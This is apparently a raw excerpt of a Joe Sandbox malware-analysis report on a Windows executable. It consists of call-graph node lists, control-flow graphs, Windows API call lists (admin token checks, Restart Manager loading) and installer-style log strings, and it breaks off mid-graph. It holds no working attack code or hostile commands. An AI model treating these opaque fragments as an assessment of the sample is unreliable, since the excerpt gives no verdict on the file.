TlsGetValue SetWindowPos 56346->56411 56401 423b84 NtdllDefWindowProc_A 56347->56401 56348->56313 56407 423b84 NtdllDefWindowProc_A 56349->56407 56406 423bc0 15 API calls 56350->56406 56353->56313 56354 423e45 56362 423e83 56354->56362 56363 423e61 56354->56363 56355->56313 56356->56313 56405 422c4c ShowWindow PostMessageA PostQuitMessage 56356->56405 56358->56313 56365 423fe5 56358->56365 56361 423ee5 56366 423efd 56361->56366 56374 41eea4 2 API calls 56361->56374 56369 423a84 6 API calls 56362->56369 56410 423b14 LocalAlloc TlsSetValue TlsGetValue TlsGetValue SetWindowPos 56363->56410 56364 423eb6 56371 423ec8 56364->56371 56372 41ef58 6 API calls 56364->56372 56379 423fec IsWindowVisible 56365->56379 56375 423a84 6 API calls 56366->56375 56367->56313 56376 423f78 IsWindowEnabled 56367->56376 56378 423e8b PostMessageA 56369->56378 56412 423b84 NtdllDefWindowProc_A 56371->56412 56372->56371 56374->56366 56375->56313 56376->56313 56380 423f86 56376->56380 56377 423e69 PostMessageA 56377->56313 56378->56313 56379->56313 56381 423ffa GetFocus 56379->56381 56413 412310 7 API calls 56380->56413 56383 4181e0 56381->56383 56384 42400f SetFocus 56383->56384 56414 415240 56384->56414 56388 423b0d 56387->56388 56389 423a94 56387->56389 56388->56282 56389->56388 56390 423a9a EnumWindows 56389->56390 56390->56388 56391 423ab6 GetWindow GetWindowLongA 56390->56391 56419 423a1c GetWindow 56390->56419 56392 423ad5 56391->56392 56392->56388 56393 423b01 SetWindowPos 56392->56393 56393->56388 56393->56392 56394->56292 56395->56292 56397 423b72 56396->56397 56398 423b7d 56396->56398 56397->56398 56399 408720 7 API calls 56397->56399 56398->56296 56398->56297 56399->56398 56400->56354 56401->56361 56402->56313 56403->56313 56404->56313 56405->56313 56406->56313 56407->56313 56408->56313 56409->56333 56410->56377 56411->56364 56412->56313 56413->56313 56415 41525b SetFocus 56414->56415 56415->56313 56416->56343 56417->56333 56418->56333 56420 423a3d GetWindowLongA 56419->56420 56421 423a49 56419->56421 56420->56421 56422 4809f7 56423 480a00 56422->56423 56424 480a2b 56422->56424 56423->56424 56425 480a1d 56423->56425 56427 480a6a 56424->56427 56796 47f4a4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56424->56796 56794 476c50 189 API calls 56425->56794 56428 480a8e 56427->56428 56431 480a81 56427->56431 56432 480a83 56427->56432 56434 480aca 56428->56434 56435 480aac 56428->56435 56430 480a5d 56797 47f50c 42 API calls 56430->56797 56439 47f4e8 42 API calls 56431->56439 56798 47f57c 42 API calls 56432->56798 56433 480a22 56433->56424 56795 408be0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 56433->56795 56801 47f33c 24 API calls 56434->56801 56440 480ac1 56435->56440 56799 47f50c 42 API calls 56435->56799 56439->56428 56800 47f33c 24 API calls 56440->56800 56444 480ac8 56445 480ada 56444->56445 56446 480ae0 56444->56446 56447 480ade 56445->56447 56450 47f4e8 42 API calls 56445->56450 56446->56447 56448 47f4e8 42 API calls 56446->56448 56548 47c66c 56447->56548 56448->56447 56450->56447 56549 42d898 GetWindowsDirectoryA 56548->56549 56550 47c690 56549->56550 56551 403450 4 API calls 56550->56551 56552 47c69d 56551->56552 56553 42d8c4 GetSystemDirectoryA 56552->56553 56554 47c6a5 56553->56554 56555 403450 4 API calls 56554->56555 56556 47c6b2 56555->56556 56557 42d8f0 6 API calls 56556->56557 56558 47c6ba 56557->56558 56559 403450 4 API calls 56558->56559 56560 47c6c7 56559->56560 56561 47c6d0 56560->56561 56562 47c6ec 56560->56562 56833 42d208 56561->56833 56564 403400 4 API calls 56562->56564 56566 47c6ea 56564->56566 56567 47c731 56566->56567 56569 42c8cc 5 API calls 56566->56569 56813 47c4f4 56567->56813 56568 403450 4 API calls 56568->56566 56571 47c70c 56569->56571 56573 403450 4 API calls 56571->56573 56575 47c719 56573->56575 56574 403450 4 API calls 56576 47c74d 56574->56576 56575->56567 56578 403450 4 API calls 56575->56578 56577 47c76b 56576->56577 56579 4035c0 4 API calls 56576->56579 56580 47c4f4 8 API calls 56577->56580 56578->56567 56579->56577 56581 47c77a 56580->56581 56582 403450 4 API calls 56581->56582 56583 47c787 56582->56583 56584 47c7af 56583->56584 56585 42c3fc 5 API calls 56583->56585 56586 47c816 56584->56586 56589 47c4f4 8 API calls 56584->56589 56587 47c79d 56585->56587 56588 47c8de 56586->56588 56593 47c836 SHGetKnownFolderPath 56586->56593 56592 4035c0 4 API calls 56587->56592 56590 47c8e7 56588->56590 56591 47c908 56588->56591 56594 47c7c7 56589->56594 56592->56584 56597 47c850 56593->56597 56598 47c88b SHGetKnownFolderPath 56593->56598 56599 403450 4 API calls 56594->56599 56598->56588 56794->56433 56796->56430 56797->56427 56798->56428 56799->56440 56800->56444 56801->56444 56814 42de1c RegOpenKeyExA 56813->56814 56815 47c51a 56814->56815 56816 47c540 56815->56816 56817 47c51e 56815->56817 56819 403400 4 API calls 56816->56819 56818 42dd4c 6 API calls 56817->56818 56820 47c52a 56818->56820 56821 47c547 56819->56821 56822 47c535 RegCloseKey 56820->56822 56823 403400 4 API calls 56820->56823 56821->56574 56822->56821 56823->56822 56834 4038a4 4 API calls 56833->56834 56836 42d21b 56834->56836 56835 42d232 GetEnvironmentVariableA 56835->56836 56837 42d23e 56835->56837 56836->56835 56840 42d245 56836->56840 56845 42dbd0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56836->56845 56838 403400 4 API calls 56837->56838 56838->56840 56840->56568 56845->56836
                                                                                        Strings
                                                                                        • User opted not to overwrite the existing file. Skipping., xrefs: 00470E4D
                                                                                        • Existing file's SHA-1 hash is different from our file. Proceeding., xrefs: 00470CC4
                                                                                        • Uninstaller requires administrator: %s, xrefs: 0047118F
                                                                                        • Failed to strip read-only attribute., xrefs: 00470ED3
                                                                                        • Will register the file (a type library) later., xrefs: 00471513
                                                                                        • Incrementing shared file count (32-bit)., xrefs: 004715A5
                                                                                        • Installing the file., xrefs: 00470F09
                                                                                        • Couldn't read time stamp. Skipping., xrefs: 00470D35
                                                                                        • Same time stamp. Skipping., xrefs: 00470D55
                                                                                        • Time stamp of our file: %s, xrefs: 0047099B
                                                                                        • Version of existing file: (none), xrefs: 00470CFA
                                                                                        • , xrefs: 00470BCF, 00470DA0, 00470E1E
                                                                                        • InUn, xrefs: 0047115F
                                                                                        • Version of existing file: %u.%u.%u.%u, xrefs: 00470B7C
                                                                                        • Version of our file: (none), xrefs: 00470AFC
                                                                                        • Non-default bitness: 64-bit, xrefs: 004708AF
                                                                                        • Existing file has a later time stamp. Skipping., xrefs: 00470DCF
                                                                                        • Skipping due to "onlyifdestfileexists" flag., xrefs: 00470EFA
                                                                                        • Dest filename: %s, xrefs: 00470894
                                                                                        • Existing file is protected by Windows File Protection. Skipping., xrefs: 00470DEC
                                                                                        • .tmp, xrefs: 00470FB7
                                                                                        • Version of our file: %u.%u.%u.%u, xrefs: 00470AF0
                                                                                        • Incrementing shared file count (64-bit)., xrefs: 0047158C
                                                                                        • Stripped read-only attribute., xrefs: 00470EC7
                                                                                        • Installing into GAC, xrefs: 00471714
                                                                                        • User opted not to strip the existing file's read-only attribute. Skipping., xrefs: 00470E96
                                                                                        • Time stamp of existing file: %s, xrefs: 00470A2B
                                                                                        • -- File entry --, xrefs: 004706FB
                                                                                        • Time stamp of existing file: (failed to read), xrefs: 00470A37
                                                                                        • Existing file's SHA-1 hash matches our file. Skipping., xrefs: 00470CB5
                                                                                        • Failed to read existing file's SHA-1 hash. Proceeding., xrefs: 00470CD0
                                                                                        • Time stamp of our file: (failed to read), xrefs: 004709A7
                                                                                        • Will register the file (a DLL/OCX) later., xrefs: 0047151F
                                                                                        • Dest file is protected by Windows File Protection., xrefs: 004708ED
                                                                                        • Existing file is a newer version. Skipping., xrefs: 00470C02
                                                                                        • Dest file exists., xrefs: 004709BB
                                                                                        • @, xrefs: 004707B0
                                                                                        • Non-default bitness: 32-bit, xrefs: 004708BB
                                                                                        • Skipping due to "onlyifdoesntexist" flag., xrefs: 004709CE
                                                                                        • Same version. Skipping., xrefs: 00470CE5
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: $-- File entry --$.tmp$@$Couldn't read time stamp. Skipping.$Dest file exists.$Dest file is protected by Windows File Protection.$Dest filename: %s$Existing file has a later time stamp. Skipping.$Existing file is a newer version. Skipping.$Existing file is protected by Windows File Protection. Skipping.$Existing file's SHA-1 hash is different from our file. Proceeding.$Existing file's SHA-1 hash matches our file. Skipping.$Failed to read existing file's SHA-1 hash. Proceeding.$Failed to strip read-only attribute.$InUn$Incrementing shared file count (32-bit).$Incrementing shared file count (64-bit).$Installing into GAC$Installing the file.$Non-default bitness: 32-bit$Non-default bitness: 64-bit$Same time stamp. Skipping.$Same version. Skipping.$Skipping due to "onlyifdestfileexists" flag.$Skipping due to "onlyifdoesntexist" flag.$Stripped read-only attribute.$Time stamp of existing file: %s$Time stamp of existing file: (failed to read)$Time stamp of our file: %s$Time stamp of our file: (failed to read)$Uninstaller requires administrator: %s$User opted not to overwrite the existing file. Skipping.$User opted not to strip the existing file's read-only attribute. Skipping.$Version of existing file: %u.%u.%u.%u$Version of existing file: (none)$Version of our file: %u.%u.%u.%u$Version of our file: (none)$Will register the file (a DLL/OCX) later.$Will register the file (a type library) later.
                                                                                        • API String ID: 0-4021121268
                                                                                        • Opcode ID: cebd1a573a13cfb1480ab73f2a07467b13e4d984594641078933206a2f2f5451
                                                                                        • Instruction ID: 04e5041402f80353ef90c659d92e8d378e84d4fed116f8838aecbbc27e5febe3
                                                                                        • Opcode Fuzzy Hash: cebd1a573a13cfb1480ab73f2a07467b13e4d984594641078933206a2f2f5451
                                                                                        • Instruction Fuzzy Hash: 31927574A0424CDFDB21DFA9C445BDDBBB5AF05304F1480ABE848A7392D7789E49CB19

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1578 42e09c-42e0ad 1579 42e0b8-42e0dd AllocateAndInitializeSid 1578->1579 1580 42e0af-42e0b3 1578->1580 1581 42e287-42e28f 1579->1581 1582 42e0e3-42e100 GetVersion 1579->1582 1580->1581 1583 42e102-42e117 GetModuleHandleA GetProcAddress 1582->1583 1584 42e119-42e11b 1582->1584 1583->1584 1585 42e142-42e15c GetCurrentThread OpenThreadToken 1584->1585 1586 42e11d-42e12b CheckTokenMembership 1584->1586 1589 42e193-42e1bb GetTokenInformation 1585->1589 1590 42e15e-42e168 GetLastError 1585->1590 1587 42e131-42e13d 1586->1587 1588 42e269-42e27f FreeSid 1586->1588 1587->1588 1591 42e1d6-42e1fa call 402648 GetTokenInformation 1589->1591 1592 42e1bd-42e1c5 GetLastError 1589->1592 1593 42e174-42e187 GetCurrentProcess OpenProcessToken 1590->1593 1594 42e16a-42e16f call 4031bc 1590->1594 1605 42e208-42e210 1591->1605 1606 42e1fc-42e206 call 4031bc * 2 1591->1606 1592->1591 1595 42e1c7-42e1d1 call 4031bc * 2 1592->1595 1593->1589 1598 42e189-42e18e call 4031bc 1593->1598 1594->1581 1595->1581 1598->1581 1607 42e212-42e213 1605->1607 1608 42e243-42e261 call 402660 CloseHandle 1605->1608 1606->1581 1611 42e215-42e228 EqualSid 1607->1611 1615 42e22a-42e237 1611->1615 1616 42e23f-42e241 1611->1616 1615->1616 1619 42e239-42e23d 1615->1619 1616->1608 1616->1611 1619->1608
                                                                                        APIs
                                                                                        • AllocateAndInitializeSid.ADVAPI32(00499788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E0D6
                                                                                        • GetVersion.KERNEL32(00000000,0042E280,?,00499788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E0F3
                                                                                        • GetModuleHandleA.KERNEL32(advapi32.dll,CheckTokenMembership,00000000,0042E280,?,00499788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E10C
                                                                                        • GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 0042E112
                                                                                        • CheckTokenMembership.KERNELBASE(00000000,00000000,?,00000000,0042E280,?,00499788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E127
                                                                                        • FreeSid.ADVAPI32(00000000,0042E287,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E27A
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressAllocateCheckFreeHandleInitializeMembershipModuleProcTokenVersion
                                                                                        • String ID: CheckTokenMembership$advapi32.dll
                                                                                        • API String ID: 2252812187-1888249752
                                                                                        • Opcode ID: a9f409996ddfe82e0213da269ff1de212d34eb3ec341ac20085b7d7d2472ef68
                                                                                        • Instruction ID: e5677345bf142a8b1d9111380f95962c8bb8cf61ba8e960ca5c3fd0f127139eb
                                                                                        • Opcode Fuzzy Hash: a9f409996ddfe82e0213da269ff1de212d34eb3ec341ac20085b7d7d2472ef68
                                                                                        • Instruction Fuzzy Hash: E351A271B44215EEEB10EAE69C42BBF77ACEB09704F9404BBB901F7281D57C99018B79

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1642 4502c0-4502cd 1643 4502d3-4502e0 GetVersion 1642->1643 1644 45037c-450386 1642->1644 1643->1644 1645 4502e6-4502fc LoadLibraryA 1643->1645 1645->1644 1646 4502fe-450377 GetProcAddress * 6 1645->1646 1646->1644
                                                                                        APIs
                                                                                        • GetVersion.KERNEL32(00480B52), ref: 004502D3
                                                                                        • LoadLibraryA.KERNEL32(Rstrtmgr.dll,00480B52), ref: 004502EB
                                                                                        • GetProcAddress.KERNEL32(6E540000,RmStartSession), ref: 00450309
                                                                                        • GetProcAddress.KERNEL32(6E540000,RmRegisterResources), ref: 0045031E
                                                                                        • GetProcAddress.KERNEL32(6E540000,RmGetList), ref: 00450333
                                                                                        • GetProcAddress.KERNEL32(6E540000,RmShutdown), ref: 00450348
                                                                                        • GetProcAddress.KERNEL32(6E540000,RmRestart), ref: 0045035D
                                                                                        • GetProcAddress.KERNEL32(6E540000,RmEndSession), ref: 00450372
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressProc$LibraryLoadVersion
                                                                                        • String ID: RmEndSession$RmGetList$RmRegisterResources$RmRestart$RmShutdown$RmStartSession$Rstrtmgr.dll
                                                                                        • API String ID: 1968650500-3419246398
                                                                                        • Opcode ID: 2681632e5309952c30eea3f8c2bf2722b4339596373eceda0d07b93e3cd0d7e4
                                                                                        • Instruction ID: c77cef2ad5653e61b65a4477cbb73d0d56cf7b8a9d174f96be3e9b6947252677
                                                                                        • Opcode Fuzzy Hash: 2681632e5309952c30eea3f8c2bf2722b4339596373eceda0d07b93e3cd0d7e4
                                                                                        • Instruction Fuzzy Hash: B211F7B4510301DBD710FB61BF45A2E36E9E728315B08063FE804961A2CB7C4844CF8C

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1790 423c0c-423c40 1791 423c42-423c43 1790->1791 1792 423c74-423c8b call 423b68 1790->1792 1794 423c45-423c61 call 40b24c 1791->1794 1797 423cec-423cf1 1792->1797 1798 423c8d 1792->1798 1827 423c63-423c6b 1794->1827 1828 423c70-423c72 1794->1828 1800 423cf3 1797->1800 1801 423d27-423d2c 1797->1801 1802 423c93-423c96 1798->1802 1803 423d50-423d60 1798->1803 1804 423fb1-423fb9 1800->1804 1805 423cf9-423d01 1800->1805 1808 423d32-423d35 1801->1808 1809 42409a-4240a8 IsIconic 1801->1809 1806 423cc5-423cc8 1802->1806 1807 423c98 1802->1807 1810 423d62-423d67 1803->1810 1811 423d6b-423d73 call 424194 1803->1811 1816 424152-42415a 1804->1816 1822 423fbf-423fca call 4181e0 1804->1822 1814 423f13-423f3a SendMessageA 1805->1814 1815 423d07-423d0c 1805->1815 1823 423da9-423db0 1806->1823 1824 423cce-423ccf 1806->1824 1818 423df6-423e06 call 423b84 1807->1818 1819 423c9e-423ca1 1807->1819 1820 4240d6-4240eb call 424850 1808->1820 1821 423d3b-423d3c 1808->1821 1809->1816 1817 4240ae-4240b9 GetFocus 1809->1817 1825 423d78-423d80 call 4241dc 1810->1825 1826 423d69-423d8c call 423b84 1810->1826 1811->1816 1814->1816 1829 423d12-423d13 1815->1829 1830 42404a-424055 1815->1830 1831 424171-424177 1816->1831 1817->1816 1838 4240bf-4240c8 call 41eff4 1817->1838 1818->1816 1839 423ca7-423caa 1819->1839 1840 423e1e-423e3a PostMessageA call 423b84 1819->1840 1820->1816 1833 423d42-423d45 1821->1833 1834 4240ed-4240f4 1821->1834 1822->1816 1866 423fd0-423fdf call 4181e0 IsWindowEnabled 1822->1866 1823->1816 1843 423db6-423dbd 1823->1843 1844 423cd5-423cd8 1824->1844 1845 423f3f-423f46 1824->1845 1825->1816 1826->1816 1827->1831 1828->1792 1828->1794 1846 424072-42407d 1829->1846 1847 423d19-423d1c 1829->1847 1830->1816 1849 42405b-42406d 1830->1849 1850 424120-424127 1833->1850 1851 423d4b 1833->1851 1860 4240f6-424109 call 4244d4 1834->1860 1861 42410b-42411e call 42452c 1834->1861 1838->1816 1898 4240ce-4240d4 SetFocus 1838->1898 1857 423cb0-423cb3 1839->1857 1858 423ea5-423eac 1839->1858 1840->1816 1843->1816 1863 423dc3-423dc9 1843->1863 1864 423cde-423ce1 1844->1864 1865 423e3f-423e5f call 423b84 1844->1865 1845->1816 1853 423f4c-423f51 call 404e54 1845->1853 1846->1816 1875 424083-424095 1846->1875 1872 423d22 1847->1872 1873 423f56-423f5e 1847->1873 1849->1816 1870 42413a-424149 1850->1870 1871 424129-424138 1850->1871 1874 42414b-42414c call 423b84 1851->1874 1853->1816 1881 423cb9-423cba 1857->1881 1882 423dce-423ddc IsIconic 1857->1882 1883 423eae-423ec1 call 423b14 1858->1883 1884 423edf-423ef0 call 423b84 1858->1884 1860->1816 1861->1816 1863->1816 1867 423ce7 1864->1867 1868 423e0b-423e19 call 424178 1864->1868 1911 423e83-423ea0 call 423a84 PostMessageA 1865->1911 1912 423e61-423e7e call 423b14 PostMessageA 1865->1912 1866->1816 1915 423fe5-423ff4 call 4181e0 IsWindowVisible 1866->1915 1867->1874 1868->1816 1870->1816 1871->1816 1872->1874 1873->1816 1896 423f64-423f6b 1873->1896 1907 424151 1874->1907 1875->1816 1899 423cc0 1881->1899 1900 423d91-423d99 1881->1900 1889 423dea-423df1 call 423b84 1882->1889 1890 423dde-423de5 call 423bc0 1882->1890 1924 423ed3-423eda call 423b84 1883->1924 1925 423ec3-423ecd call 41ef58 1883->1925 1918 423ef2-423ef8 call 41eea4 1884->1918 1919 423f06-423f0e call 423a84 1884->1919 1889->1816 1890->1816 1896->1816 1910 423f71-423f80 call 4181e0 IsWindowEnabled 1896->1910 1898->1816 1899->1874 1900->1816 1913 423d9f-423da4 call 422c4c 1900->1913 1907->1816 1910->1816 1940 423f86-423f9c call 412310 1910->1940 1911->1816 1912->1816 1913->1816 1915->1816 1941 423ffa-424045 GetFocus call 4181e0 SetFocus call 415240 SetFocus 1915->1941 1938 423efd-423f00 1918->1938 1919->1816 1924->1816 1925->1924 1938->1919 1940->1816 1946 423fa2-423fac 1940->1946 1941->1816 1946->1816
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 22958418fcb5307417e2cb8c5b21c835fdc4d5c2778e3f26f52eb9817f6a2da5
                                                                                        • Instruction ID: afb4f91cf4018cf9acc1c9974f14325182323c15c0e0405bd0f9b005e596376e
                                                                                        • Opcode Fuzzy Hash: 22958418fcb5307417e2cb8c5b21c835fdc4d5c2778e3f26f52eb9817f6a2da5
                                                                                        • Instruction Fuzzy Hash: 03E1AE31700124EFDB04DF69E989AADB7B5FB54300FA440AAE5559B352C73CEE81DB09

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 2133 4673a4-4673ba 2134 4673c4-46747b call 49577c call 402b30 * 6 2133->2134 2135 4673bc-4673bf call 402d30 2133->2135 2152 46747d-4674a4 call 41463c 2134->2152 2153 4674b8-4674d1 2134->2153 2135->2134 2157 4674a6 2152->2157 2158 4674a9-4674b3 call 4145fc 2152->2158 2159 4674d3-4674fa call 41461c 2153->2159 2160 46750e-46751c call 495a84 2153->2160 2157->2158 2158->2153 2166 4674ff-467509 call 4145dc 2159->2166 2167 4674fc 2159->2167 2168 46751e-46752d call 4958cc 2160->2168 2169 46752f-467531 call 4959f0 2160->2169 2166->2160 2167->2166 2174 467536-467589 call 4953e0 call 41a3d0 * 2 2168->2174 2169->2174 2181 46759a-4675af call 451458 call 414b18 2174->2181 2182 46758b-467598 call 414b18 2174->2182 2188 4675b4-4675bb 2181->2188 2182->2188 2189 467603-467a89 call 49581c call 495b40 call 41461c * 3 call 4146bc call 4145dc * 3 call 460bfc call 460c14 call 460c20 call 460c68 call 460bfc call 460c14 call 460c20 call 460c68 call 460c14 call 460c68 LoadBitmapA call 41d6b0 call 460c38 call 460c50 call 467180 call 468c94 call 466800 call 40357c call 414b18 call 466b38 call 466b40 call 466800 call 40357c * 2 call 414b18 call 468c94 call 466800 call 414b18 call 466b38 call 466b40 call 414b18 * 2 call 468c94 call 414b18 * 2 call 466b38 call 4145fc call 466b38 call 4145fc call 468c94 call 414b18 call 466b38 call 466b40 call 468c94 call 414b18 call 466b38 call 4145fc * 2 call 414b18 call 466b38 call 4145fc 2188->2189 2190 4675bd-4675fe call 4146bc call 414700 call 420f98 call 420fc4 call 420b68 call 420b94 2188->2190 2320 467ae5-467afe call 414a44 * 2 2189->2320 2321 467a8b-467ae3 call 4145fc call 414b18 call 466b38 call 4145fc 2189->2321 2190->2189 2328 467b03-467bb4 call 466800 call 468c94 call 466800 call 414b18 call 495b40 call 466b38 2320->2328 2321->2328 2347 467bb6-467bd1 2328->2347 2348 467bee-467e24 call 466800 call 414b18 call 495b50 * 2 call 42e8c0 call 4145fc call 466b38 call 4145fc call 4181e0 call 42ed38 call 414b18 call 49581c call 495b40 call 41461c call 466800 call 414b18 call 466b38 call 4145fc call 466800 call 468c94 call 466800 call 414b18 call 466b38 call 4145fc call 466b40 call 466800 call 414b18 call 466b38 2328->2348 2349 467bd6-467be9 call 4145fc 2347->2349 2350 467bd3 2347->2350 2409 467e26-467e2f 2348->2409 2410 467e65-467f1e call 466800 call 468c94 call 466800 call 414b18 call 495b40 call 466b38 2348->2410 2349->2348 2350->2349 2409->2410 2411 467e31-467e60 call 414a44 call 466b40 2409->2411 2428 467f20-467f3b 2410->2428 2429 467f58-468379 call 466800 call 414b18 call 495b50 * 2 call 42e8c0 call 4145fc call 466b38 call 4145fc call 414b18 call 49581c call 495b40 call 41461c call 414b18 call 466800 call 468c94 call 466800 call 414b18 call 466b38 call 466b40 call 42bbd0 call 495b50 call 44e8b0 call 466800 call 468c94 call 466800 call 468c94 call 466800 call 468c94 * 2 call 414b18 call 466b38 call 466b40 call 468c94 call 4953e0 call 41a3d0 call 466800 call 40357c call 414b18 call 466b38 call 4145fc call 414b18 * 2 call 495b50 call 403494 call 40357c * 2 call 414b18 2410->2429 2411->2410 2430 467f40-467f53 call 4145fc 2428->2430 2431 467f3d 2428->2431 2528 46839d-4683a4 2429->2528 2529 46837b-468398 call 44ffdc call 450138 2429->2529 2430->2429 2431->2430 2531 4683a6-4683c3 call 44ffdc call 450138 2528->2531 2532 4683c8-4683cf 2528->2532 2529->2528 2531->2532 2534 4683f3-468439 call 4181e0 GetSystemMenu AppendMenuA call 403738 AppendMenuA call 468d88 2532->2534 2535 4683d1-4683ee call 44ffdc call 450138 2532->2535 2549 468453 2534->2549 2550 46843b-468442 2534->2550 2535->2534 2553 468455-468464 2549->2553 2551 468444-46844d 2550->2551 2552 46844f-468451 2550->2552 2551->2549 2551->2552 2552->2553 2554 468466-46846d 2553->2554 2555 46847e 2553->2555 2556 46846f-468478 2554->2556 2557 46847a-46847c 2554->2557 2558 468480-46849a 2555->2558 2556->2555 2556->2557 2557->2558 2559 468543-46854a 2558->2559 2560 4684a0-4684a9 2558->2560 2563 468550-468573 call 47c26c call 403450 2559->2563 2564 4685dd-4685eb call 414b18 2559->2564 2561 468504-46853e call 414b18 * 3 2560->2561 2562 4684ab-468502 call 47c26c call 414b18 call 47c26c call 414b18 call 47c26c call 414b18 2560->2562 2561->2559 2562->2559 2583 468584-468598 call 403494 2563->2583 2584 468575-468582 call 47c440 2563->2584 2570 4685f0-4685f9 2564->2570 2574 4685ff-468617 call 429fd8 2570->2574 2575 468709-468738 call 42b96c call 44e83c 2570->2575 2592 46868e-468692 2574->2592 2593 468619-46861d 2574->2593 2609 4687e6-4687ea 2575->2609 2610 46873e-468742 2575->2610 2605 4685aa-4685db call 42c804 call 42cbc0 call 403494 call 414b18 2583->2605 2606 46859a-4685a5 call 403494 2583->2606 2584->2605 2598 468694-46869d 2592->2598 2599 4686e2-4686e6 2592->2599 2600 46861f-468659 call 40b24c call 47c26c 2593->2600 2598->2599 2607 46869f-4686aa 2598->2607 2603 4686fa-468704 call 42a05c 2599->2603 2604 4686e8-4686f8 call 42a05c 2599->2604 2660 46865b-468662 2600->2660 2661 468688-46868c 2600->2661 2603->2575 2604->2575 2605->2570 2606->2605 2607->2599 2619 4686ac-4686b0 2607->2619 2612 4687ec-4687f3 2609->2612 2613 468869-46886d 2609->2613 2611 468744-468756 call 40b24c 2610->2611 2639 468788-4687bf call 47c26c call 44cb0c 2611->2639 2640 468758-468786 call 47c26c call 44cbdc 2611->2640 2612->2613 2622 4687f5-4687fc 2612->2622 2623 4688d6-4688df 2613->2623 2624 46886f-468886 call 40b24c 2613->2624 2628 4686b2-4686d5 call 40b24c call 406ac4 2619->2628 2622->2613 2633 4687fe-468809 2622->2633 2631 4688e1-4688f9 call 40b24c call 4699fc 2623->2631 2632 4688fe-468913 call 466ee0 call 466c5c 2623->2632 2654 4688c6-4688d4 call 4699fc 2624->2654 2655 468888-4688c4 call 40b24c call 4699fc * 2 call 46989c 2624->2655 2671 4686d7-4686da 2628->2671 2672 4686dc-4686e0 2628->2672 2631->2632 2685 468965-46896f call 414a44 2632->2685 2686 